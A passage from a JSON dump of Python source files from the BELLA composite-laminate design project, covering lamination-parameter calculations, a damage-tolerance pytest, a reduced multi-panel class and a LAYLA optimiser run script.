\\\r\n = mom_areas[ind_panel][ind_ply, 1] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 8:12] \\\r\n = mom_areas[ind_panel][ind_ply, 2] * constraints.cos_sin\r\n\r\n delta_lampams.append(delta_lampams_panel)\r\n\r\n return delta_lampams\r\n\r\n\r\ndef calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise):\r\n \"\"\"\r\n calulates all ply partial lamination parameters in a multipanel structure\r\n that correspond to a specific ply drop layout\r\n\r\n INPUTS\r\n\r\n - multipanel: multipanel structure\r\n - delta_lampams: all ply partial lamination parameters in the multipanel\r\n structure\r\n - pdl: ply drop layout\r\n - constraints: set of constraints\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n \"\"\"\r\n lampam_matrix = np.zeros((\r\n multipanel.reduced.n_panels,\r\n constraints.n_set_of_angles,\r\n n_plies_to_optimise,\r\n 12), float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n for ind_angle in range(constraints.n_set_of_angles):\r\n counter_plies = -1\r\n for index_ply in range(n_plies_to_optimise):\r\n if pdl[ind_panel, index_ply] != -1:\r\n counter_plies += 1\r\n# print('ind_panel, ind_angle, index_ply',\r\n# ind_panel, ind_angle, index_ply)\r\n# print('counter_plies', counter_plies)\r\n lampam_matrix[ind_panel, ind_angle, index_ply, :] \\\r\n = delta_lampams[ind_panel][counter_plies, ind_angle]\r\n return lampam_matrix\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_delta_lampams ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.panels import Panel\r\n from src.BELLA.multipanels import MultiPanel\r\n from src.BELLA.parameters import Parameters\r\n from src.BELLA.obj_function import ObjFunction\r\n from src.BELLA.ply_order import calc_ply_order\r\n from src.BELLA.moments_of_areas import calc_mom_of_areas\r\n from src.BELLA.pdl_ini import create_initial_pdls\r\n from src.BELLA.divide_panels import divide_panels\r\n\r\n constraints = Constraints(sym=False)\r\n constraints = Constraints(sym=True)\r\n obj_func_param = ObjFunction(constraints)\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[], n_plies=6)\r\n multipanel = MultiPanel([panel1])\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[1], n_plies=16)\r\n panel2 = Panel(2, constraints, neighbour_panels=[1], n_plies=18)\r\n multipanel = MultiPanel([panel1, panel2])\r\n\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n delta_lampams = calc_delta_lampams(\r\n multipanel, constraints, mom_areas, ply_order)\r\n\r\n print(delta_lampams[0][0][0])\r\n print(delta_lampams[0][-1][0])\r\n\r\n\r\n print('*** Test for the functions calc_delta_lampams2 ***\\n')\r\n divide_panels(multipanel, parameters, constraints)\r\n pdl = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)[0]\r\n lampam_matrix = calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise)"
},
{
"alpha_fraction": 0.5670102834701538,
"alphanum_fraction": 0.6082473993301392,
"avg_line_length": 31.576923370361328,
"blob_id": "ce7fe349504f92be09ca655632f9c37cad13f51c",
"content_id": "721a5c539572941829e80bdeb6a70c2c1d29fd42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 26,
"path": "/src/guidelines/test_dam_tol.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module tests the functions in dam_tol.py.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pytest\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.guidelines.dam_tol import is_dam_tol\r\n\r\[email protected](\r\n \"stack, constraints, expect\", [\r\n (np.array([45, 0, -45]), Constraints(dam_tol=True, dam_tol_rule=1), True),\r\n (np.array([45, 0, 0]), Constraints(dam_tol=True, dam_tol_rule=1), False),\r\n (np.array([45, -45, 0, 45, -45]), Constraints(dam_tol=True, dam_tol_rule=2), True),\r\n (np.array([45, -45, 0, 90, -45]), Constraints(dam_tol=True, dam_tol_rule=2), False),\r\n ])\r\n\r\ndef test_is_dam_tol(stack, constraints, expect):\r\n output = is_dam_tol(stack, constraints)\r\n assert output == expect\r\n"
},
{
"alpha_fraction": 0.545465350151062,
"alphanum_fraction": 0.5545939803123474,
"avg_line_length": 41.14577865600586,
"blob_id": "a9bc8c466560f42bde8df0703c6c4b222a734536",
"content_id": "c5dfcf1a05bc5a2057fa66fc7d882bad2b1b3163",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16870,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 391,
"path": "/src/BELLA/reduced_multipanels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for reduced multi-panel structures\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\nclass ReducedMultiPanel():\r\n \"\"\"\r\n Class for reduced multi-panel structures\r\n \"\"\"\r\n def __init__(self, multipanel, constraints, n_plies_ref_panel=1):\r\n \"\"\"Create object for storing multi-panel structures information\r\n\r\n - n_plies_in_panels:\r\n the ordered list with the panels ply counts that are used to build\r\n the stacking sequence table.\r\n - n_panels:\r\n number of panels with diffrent thicknesses in the stacking sequence\r\n table\r\n - n_plies_ref_panel:\r\n ply count of reference panel\r\n - ind_panels_guide:\r\n a mapping of the panels of the structure with the corrresponding\r\n stack in the stacking sequence table\r\n - ind_for_reduc:\r\n indices of n_panels panels with different thickness\r\n - ind_ref:\r\n index of reference panel for repair\r\n - boundaries:\r\n list of panels adjacency to consider expressed with the indices for\r\n the reduced number of panels\r\n - panel_weightings_ini_2_guide:\r\n initial panel weightings in the reduced multipanel objective\r\n function\r\n - panel_weightings_ini_2A_guide:\r\n initial panel weightings in the reduced multipanel in-plane\r\n objective function\r\n - panel_weightings_ini_2D_guide:\r\n initial panel weightings in the reduced multipanel out-of-plane\r\n objective function\r\n \"\"\"\r\n\r\n (self.n_plies_in_panels, self.ind_for_reduc,\r\n self.ind_panels_guide) = np.unique(\r\n [panel.n_plies for panel in multipanel.panels],\r\n return_inverse=True, return_index=True)\r\n\r\n if constraints.sym:\r\n has_middle_ply = False\r\n for n_plies in self.n_plies_in_panels:\r\n if has_middle_ply and not n_plies % 2:\r\n raise Exception(\"\"\"\r\nThe panel ply counts are not compatible with guide-based blending (middle ply)\"\"\")\r\n if n_plies % 2:\r\n has_middle_ply = True\r\n\r\n self.ind_for_reduc = self.ind_for_reduc.astype(int)\r\n\r\n self.n_panels = self.n_plies_in_panels.size\r\n self.ind_thick = self.n_panels - 1\r\n\r\n# print('n_plies_in_panels', self.n_plies_in_panels)\r\n# print('n_panels', self.n_panels)\r\n# print('ind_panels_guide', self.ind_panels_guide)\r\n# print('ind_for_reduc', self.ind_for_reduc)\r\n\r\n # reduced panel weightings in the reduced multipanel objective function\r\n self.panel_weightings_ini = np.zeros((self.n_panels,))\r\n for ind_panel in range(self.n_panels):\r\n self.panel_weightings_ini[self.ind_panels_guide[\r\n ind_panel]] += self.panel_weightings_ini[ind_panel]\r\n# print('self.panel_weightings_ini', self.panel_weightings_ini)\r\n\r\n if n_plies_ref_panel in self.n_plies_in_panels:\r\n ind_min = np.argmin(abs(self.n_plies_in_panels-n_plies_ref_panel))\r\n self.ind_ref = ind_min\r\n if n_plies_ref_panel <= self.n_plies_in_panels[0]:\r\n self.ind_ref = 0\r\n elif n_plies_ref_panel >= self.n_plies_in_panels[-1]:\r\n self.ind_ref = self.n_panels - 1\r\n else:\r\n index = 0\r\n while True:\r\n n_plies_1 = self.n_plies_in_panels[index]\r\n n_plies_2 = self.n_plies_in_panels[index + 1]\r\n if n_plies_ref_panel > n_plies_1 \\\r\n and n_plies_ref_panel <= n_plies_2:\r\n self.ind_ref = index + 1\r\n break\r\n else:\r\n index += 1\r\n\r\n self.n_plies_ref_panel = self.n_plies_in_panels[self.ind_ref]\r\n\r\n self.panels = [multipanel.panels[self.ind_for_reduc[ind_panel]] \\\r\n for ind_panel in range(self.n_panels)]\r\n\r\n self.n_panels_thin = self.ind_ref + 1\r\n self.n_panels_thick = self.n_panels - self.ind_ref\r\n\r\n self.middle_ply_indices = np.array(\r\n [self.panels[ind_panel].middle_ply_index \\\r\n for ind_panel in range(self.n_panels)])\r\n\r\n self.check_boundary_weights(multipanel)\r\n\r\n self.calc_panel_weigthings(multipanel)\r\n\r\n self.calc_parameters(multipanel, constraints)\r\n\r\n def check_boundary_weights(self, multipanel):\r\n \"\"\"\r\n check the boundary weights\r\n\r\n \"\"\"\r\n self.boundaries = []\r\n for elem1, elem2 in multipanel.boundaries:\r\n elem1 = self.ind_panels_guide[elem1]\r\n elem2 = self.ind_panels_guide[elem2]\r\n loc_boundary = [elem1, elem2]\r\n loc_boundary.sort()\r\n if loc_boundary not in self.boundaries and elem1 != elem2:\r\n self.boundaries.append(loc_boundary)\r\n self.boundaries = np.array(self.boundaries)\r\n\r\n ## boundary weightings\r\n self.boundary_weights = dict()\r\n \r\n for panel1, panel2 in multipanel.boundaries:\r\n weight = multipanel.boundary_weights[(panel1, panel2)]\r\n panel1_in_strip = self.ind_panels_guide[panel1]\r\n panel2_in_strip = self.ind_panels_guide[panel2]\r\n panel1_in_strip, panel2_in_strip = sorted((panel1_in_strip, \r\n panel2_in_strip))\r\n if panel1_in_strip != panel2_in_strip:\r\n \r\n if (panel1_in_strip, panel2_in_strip) in self.boundary_weights:\r\n self.boundary_weights[\r\n (panel1_in_strip, panel2_in_strip)] += weight\r\n else:\r\n self.boundary_weights[\r\n (panel1_in_strip, panel2_in_strip)] = weight \r\n \r\n\r\n def calc_panel_weigthings(self, multipanel):\r\n \"\"\"\r\n returns the panel weightings for the objective function at each step\r\n of the thick-to-thin or thin-to-thick repair\r\n\r\n The function accounts only for the panel for which the ply drop will be\r\n determined.\r\n\r\n Moreover, the weightings of panel assumed to have the same lamination\r\n parameters are aggregated\r\n \"\"\"\r\n self.actual_panel_weightings = np.zeros((self.n_panels,))\r\n for ind_panel, panel in enumerate(self.panels):\r\n self.actual_panel_weightings[\r\n self.ind_panels_guide[ind_panel]] += panel.weighting\r\n\r\n list_all = [[] for ind in range(self.n_panels)]\r\n\r\n for ind_panel in range(self.ind_ref):\r\n\r\n # print('multipanel.reduced.actual_panel_weightings',\r\n # multipanel.reduced.actual_panel_weightings)\r\n panel_weightings = np.copy(\r\n self.actual_panel_weightings)[:self.ind_ref]\r\n panel_weightings /= sum(panel_weightings)\r\n # print('panel_weightings', panel_weightings)\r\n to_add, panel_weightings = (panel_weightings[:ind_panel],\r\n panel_weightings[ind_panel:])\r\n # print('panel_weightings', panel_weightings, 'to_add', to_add)\r\n panel_weightings[0] += sum(to_add)\r\n list_all[ind_panel] = panel_weightings\r\n # print('panel_weightings', panel_weightings)\r\n\r\n for ind_panel in range(self.ind_ref + 1, self.n_panels):\r\n\r\n # print('self.actual_panel_weightings',\r\n # self.actual_panel_weightings)\r\n panel_weightings = np.copy(\r\n self.actual_panel_weightings)[self.ind_ref + 1:] # YEEEES\r\n panel_weightings /= sum(panel_weightings)\r\n # print('panel_weightings', panel_weightings)\r\n panel_weightings, to_add = (\r\n panel_weightings[:ind_panel - self.ind_ref],\r\n panel_weightings[ind_panel - self.ind_ref:])\r\n # print('panel_weightings', panel_weightings, 'to_add', to_add)\r\n panel_weightings[-1] += sum(to_add)\r\n list_all[ind_panel] = panel_weightings\r\n # print('panel_weightings', panel_weightings)\r\n\r\n self.panel_weightings = list_all\r\n\r\n\r\n def calc_parameters(self, multipanel, constraints):\r\n \"\"\"\r\n caluclates values usefull during the beam search for thick-to-thin or\r\n thin-to-thick repair\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n\r\n OUTPUTS\r\n\r\n - n_steps: number of ply drops to investigate\r\n - ind_panel_tab: index of panel where the next ply drop is located at each\r\n step of the beam search\r\n - n_plies_panel_after_tab: total number of plies in panel where the next\r\n ply drop is located at each step of the beam search\r\n - n_plies_after_tab: number of plies in panel after the next ply drop dealt\r\n with at each step of the beam search\r\n - n_plies_before_tab: number of plies in panel before the next ply drop\r\n dealt with at each step of the beam search\r\n - new_boundary_tab: indicate if the next ply drop to optimise is the first\r\n to be optimised in the panel, at each step of the beam search\r\n - n_panels_designed_tab: number of panels for which the ply drops have been\r\n designed so far\r\n \"\"\"\r\n ### thick to thin\r\n n_steps = self.n_plies_ref_panel - self.n_plies_in_panels[0]\r\n\r\n if constraints.sym:\r\n n_steps //= 2\r\n\r\n if not n_steps:\r\n self.n_steps_thin = 0\r\n self.ind_panel_thin_tab = None\r\n self.n_plies_after_thin_tab = None\r\n self.n_plies_before_thin_tab = None\r\n self.new_boundary_thin_tab = None\r\n self.n_panels_designed_thin_tab = None\r\n\r\n else:\r\n\r\n ind_panel_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_panel_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_before_tab = np.zeros((n_steps,), dtype='int16')\r\n n_panels_designed_tab = np.zeros((n_steps,), dtype='int16')\r\n new_boundary_tab = np.zeros((n_steps,), bool)\r\n\r\n ind_panel_tab[0] = self.ind_ref - 1\r\n n_plies_panel_after_tab[0] = self.n_plies_in_panels[\r\n ind_panel_tab[0]]\r\n if constraints.sym:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel - 2\r\n else:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel - 1\r\n n_plies_before_tab[0] = self.n_plies_ref_panel\r\n new_boundary_tab[0] = True\r\n\r\n for ind_step in range(1, n_steps):\r\n # add same values\r\n ind_panel_tab[ind_step] = ind_panel_tab[ind_step - 1]\r\n n_plies_after_tab[ind_step] = n_plies_after_tab[ind_step - 1]\r\n n_plies_before_tab[ind_step] = n_plies_before_tab[ind_step - 1]\r\n n_plies_panel_after_tab[ind_step] = n_plies_panel_after_tab[\r\n ind_step - 1]\r\n\r\n if constraints.sym:\r\n n_plies_after_tab[ind_step] -= 2\r\n n_plies_before_tab[ind_step] -= 2\r\n else:\r\n n_plies_after_tab[ind_step] -= 1\r\n n_plies_before_tab[ind_step] -= 1\r\n if n_plies_after_tab[ind_step] < n_plies_panel_after_tab[ind_step]:\r\n ind_panel_tab[ind_step] -= 1\r\n n_plies_panel_after_tab[\r\n ind_step] = self.n_plies_in_panels[\r\n ind_panel_tab[ind_step]]\r\n new_boundary_tab[ind_step] = True\r\n else:\r\n new_boundary_tab[ind_step] = False\r\n\r\n n_panels_designed_tab[ind_step] = n_panels_designed_tab[ind_step - 1]\r\n if new_boundary_tab[ind_step]:\r\n n_panels_designed_tab[ind_step] += 1\r\n\r\n self.n_steps_thin = n_steps\r\n self.ind_panel_thin_tab = ind_panel_tab\r\n self.n_plies_after_thin_tab = n_plies_after_tab\r\n self.n_plies_before_thin_tab = n_plies_before_tab\r\n self.new_boundary_thin_tab = new_boundary_tab\r\n self.n_panels_designed_thin_tab = n_panels_designed_tab\r\n\r\n ### thin to thick\r\n\r\n n_steps = self.n_plies_in_panels[-1] - self.n_plies_ref_panel\r\n\r\n if constraints.sym:\r\n n_steps //= 2\r\n\r\n if not n_steps:\r\n self.n_steps_thick = 0\r\n self.ind_panel_thick_tab = None\r\n self.n_plies_after_thick_tab = None\r\n self.n_plies_before_thick_tab = None\r\n self.new_boundary_thick_tab = None\r\n self.n_panels_designed_thick_tab = None\r\n else:\r\n ind_panel_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_panel_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_before_tab = np.zeros((n_steps,), dtype='int16')\r\n n_panels_designed_tab = np.zeros((n_steps,), dtype='int16')\r\n new_boundary_tab = np.zeros((n_steps,), bool)\r\n\r\n ind_panel_tab[0] = self.ind_ref + 1\r\n n_plies_panel_after_tab[0] = self.n_plies_in_panels[\r\n ind_panel_tab[0]]\r\n if constraints.sym:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel + 2\r\n else:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel + 1\r\n n_plies_before_tab[0] = self.n_plies_ref_panel\r\n new_boundary_tab[0] = True\r\n\r\n for ind_step in range(1, n_steps):\r\n # add same values\r\n ind_panel_tab[ind_step] = ind_panel_tab[ind_step - 1]\r\n n_plies_after_tab[ind_step] = n_plies_after_tab[ind_step - 1]\r\n n_plies_before_tab[ind_step] = n_plies_before_tab[ind_step - 1]\r\n n_plies_panel_after_tab[ind_step] = n_plies_panel_after_tab[\r\n ind_step - 1]\r\n\r\n if constraints.sym:\r\n n_plies_after_tab[ind_step] += 2\r\n n_plies_before_tab[ind_step] += 2\r\n else:\r\n n_plies_after_tab[ind_step] += 1\r\n n_plies_before_tab[ind_step] += 1\r\n if n_plies_after_tab[ind_step] > n_plies_panel_after_tab[ind_step]:\r\n ind_panel_tab[ind_step] += 1\r\n n_plies_panel_after_tab[\r\n ind_step] = self.n_plies_in_panels[\r\n ind_panel_tab[ind_step]]\r\n new_boundary_tab[ind_step] = True\r\n else:\r\n new_boundary_tab[ind_step] = False\r\n\r\n n_panels_designed_tab[ind_step] = n_panels_designed_tab[ind_step - 1]\r\n if new_boundary_tab[ind_step]:\r\n n_panels_designed_tab[ind_step] += 1\r\n\r\n\r\n self.n_steps_thick = n_steps\r\n self.ind_panel_thick_tab = ind_panel_tab\r\n self.n_plies_after_thick_tab = n_plies_after_tab\r\n self.n_plies_before_thick_tab = n_plies_before_tab\r\n self.new_boundary_thick_tab = new_boundary_tab\r\n self.n_panels_designed_thick_tab = n_panels_designed_tab\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n return f\"\"\"\r\nReduced multipanel structure (blending strip):\r\n Number of panels: {self.n_panels}\r\n Number of plies per panel (ordered): {self.n_plies_in_panels}\r\n Number of plies in reference panel: {self.n_plies_ref_panel}\r\n Indices of panel middle plies: {self.middle_ply_indices}\r\n Reduced index of thick panel: {self.ind_thick}\r\n Reduced index of reference panel: {self.ind_ref}\r\n Panel boundaries in reduced indices: {self.boundaries}\r\n Mapping multipanel structure to blending strip: {self.ind_panels_guide}\r\n Mapping blending strip to multipanel structure: {self.ind_for_reduc}\r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.panels import Panel\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.multipanels import MultiPanel\r\n constraints = Constraints(sym=True)\r\n panel1 = Panel(1, constraints, neighbour_panels=[5], n_plies=12)\r\n panel2 = Panel(5, constraints, neighbour_panels=[1], n_plies=16)\r\n panel3 = Panel(2, constraints, neighbour_panels=[1, 5], n_plies=14)\r\n panel4 = Panel(6, constraints, neighbour_panels=[1], n_plies=10)\r\n multipanel = MultiPanel([panel1, panel2, panel3, panel4])\r\n print(multipanel)\r\n multipanel.from_mp_to_blending_strip(constraints, n_plies_ref_panel=12)\r\n print(multipanel.reduced)\r\n# print(multipanel.reduced.panels)\r\n"
},
{
"alpha_fraction": 0.5744543671607971,
"alphanum_fraction": 0.6122110486030579,
"avg_line_length": 33.148868560791016,
"blob_id": "3ca157a6539fd0d154ab5a51c5fca5669864dcb8",
"content_id": "599cbefb5ae6eb59dc9b26685452fd07715c7fb8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10859,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 309,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_V02.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script retrieves LAminate LAY-ups from one set of lamination parameters.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\n\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport math as ma\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.CLA.lampam_functions import calc_lampam_2\r\nfrom src.BELLA.materials import Material\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\n#==============================================================================\r\n# Targets\r\n#==============================================================================\r\n# Total number of plies\r\nn_plies = 61\r\n# Stacking sequence target\r\nss_target = np.array([45, 90, -45, 0, 0], dtype='int16')\r\nprint_ss(ss_target, 200)\r\n\r\n# Calculation of target lamination parameters\r\nlampam = calc_lampam_2(ss_target)\r\nprint_lampam(lampam)\r\n\r\ntargets = Targets(n_plies=n_plies, lampam=lampam, stack=ss_target)\r\n\r\n#==============================================================================\r\n# Type of optimisations\r\n#==============================================================================\r\noptimisation_type = 'A' # only in-plane lamination parameters optimised\r\noptimisation_type = 'D' # only out-of-plane lamination parameters optimised\r\noptimisation_type = 'AD' # in- and out-of-plane lamination parameters optimised\r\n\r\n#==============================================================================\r\n# Design guidelines\r\n#==============================================================================\r\n### Set of design and manufacturing constraints:\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n# C0: - No design and manufacturing constraints other than symmetry\r\n# C1: - in-plane orthotropy enforced with penalties and repair\r\n# - 10% rule enforced with repair\r\n# - 10% 0deg plies\r\n# - 10% 90 deg plies\r\n# - 10% 45deg plies\r\n# - 10% -45 deg plies\r\n# - disorientation rule with Delta(theta) = 45 deg\r\n# - contiguity rule with n_contig = 5\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# symmetry\r\nsym = False\r\n\r\n# balance and in-plane orthotropy requirements\r\nif constraints_set == 'C0':\r\n bal = False\r\n ipo = False\r\nelse:\r\n bal = True\r\n ipo = True\r\n\r\n# out-of-plane orthotropy requirements\r\noopo = False\r\n\r\n# damage tolerance\r\ndam_tol = True\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies at laminate\r\ndam_tol_rule = 1\r\ndam_tol_rule = 2\r\n#dam_tol_rule = 3\r\n\r\n# 10% rule\r\nif constraints_set == 'C0':\r\n rule_10_percent = False\r\nelse:\r\n rule_10_percent = True\r\ncombine_45_135 = True\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\n\r\n# disorientation\r\nif constraints_set == 'C0':\r\n diso = False\r\nelse:\r\n diso = True\r\n\r\n# Upper bound of the variation of fibre orientation between two\r\n# contiguous plies if the disorientation constraint is active\r\ndelta_angle = 45\r\n\r\n# contiguity\r\nif constraints_set == 'C0':\r\n contig = False\r\nelse:\r\n contig = True\r\n\r\nn_contig = 4\r\n# No more that constraints.n_contig plies with same fibre orientation should be\r\n# next to each other if the contiguity constraint is active. The value taken\r\n# can only be 2, 3, 4 or 5, otherwise test functions should be modified\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n ipo=ipo,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n rule_10_percent=rule_10_percent,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles)\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 130e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 9e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 4e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# number of outer loops\r\nn_outer_step = 1\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 8\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 8\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation optimisation\r\nglobal_node_limit_p = 8\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter restrictions\r\npenalty_10_lampam_switch = True\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = True\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n# balanced laminate scheme\r\nbalanced_scheme = False\r\n\r\nif constraints_set == 'C0':\r\n # penalty for the 10% rule based on ply count restrictions\r\n penalty_10_pc_switch = False\r\n # penalty for the 10% rule based on lamination parameter restrictions\r\n penalty_10_lampam_switch = False\r\n # penalty for in-plane orthotropy, based on lamination parameters\r\n penalty_ipo_switch = False\r\n # penalty for balance, based on ply counts\r\n penalty_bal_switch = False\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 12, 12, 12, 12])\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\nif optimisation_type == 'A':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nif optimisation_type == 'D':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nif optimisation_type == 'AD':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Lamination parameters sensitivities from the first-lebel optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n coeff_10=coeff_10,\r\n coeff_bal_ipo=coeff_bal_ipo,\r\n coeff_oopo=coeff_oopo,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n n_outer_step=n_outer_step,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n first_level_sensitivities=first_level_sensitivities,\r\n lampam_to_be_optimised=lampam_to_be_optimised,\r\n global_node_limit=global_node_limit,\r\n local_node_limit=local_node_limit,\r\n global_node_limit_p=global_node_limit_p,\r\n local_node_limit_final=local_node_limit_final,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n penalty_10_pc_switch=penalty_10_pc_switch,\r\n penalty_ipo_switch=penalty_ipo_switch,\r\n 